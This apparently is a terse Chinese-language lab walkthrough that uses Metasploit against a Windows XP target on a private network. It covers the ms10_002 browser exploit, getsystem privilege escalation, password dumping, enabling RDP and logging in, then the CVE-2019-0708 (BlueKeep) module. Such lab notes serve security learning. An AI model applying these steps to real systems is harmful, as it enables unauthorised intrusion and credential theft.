xp ip 192.168.1.136
ms10_002需要靶机点击msf生成的网站才会建立shell
cve_2019_0708需要3389远程桌面连接的时候使用
search ms10_002查找漏洞
use 进入漏洞
设置payload和查看要配置的参数
设置 srvport 为80 lport为 443 uripath 为 /
靶机打开192.168.1.138
建立shell
这里我们想导出密码发现权限不够,使用getsystem提权导出密码
解码得到密码为123456
用 netstat an 查看开放的端口
run post/windows/manage/enable_rdp 开放远程桌面连接
netstat an 发现3389已经开启了
rdesktop 192.168.1.136 连接靶机
使用Administrator : 123456登录
cve_2019_0708漏洞
nmap得知3389开放
search 查找漏洞
use 进入
配置payload options查看配置参数 set shosts 靶机IP
拿到shell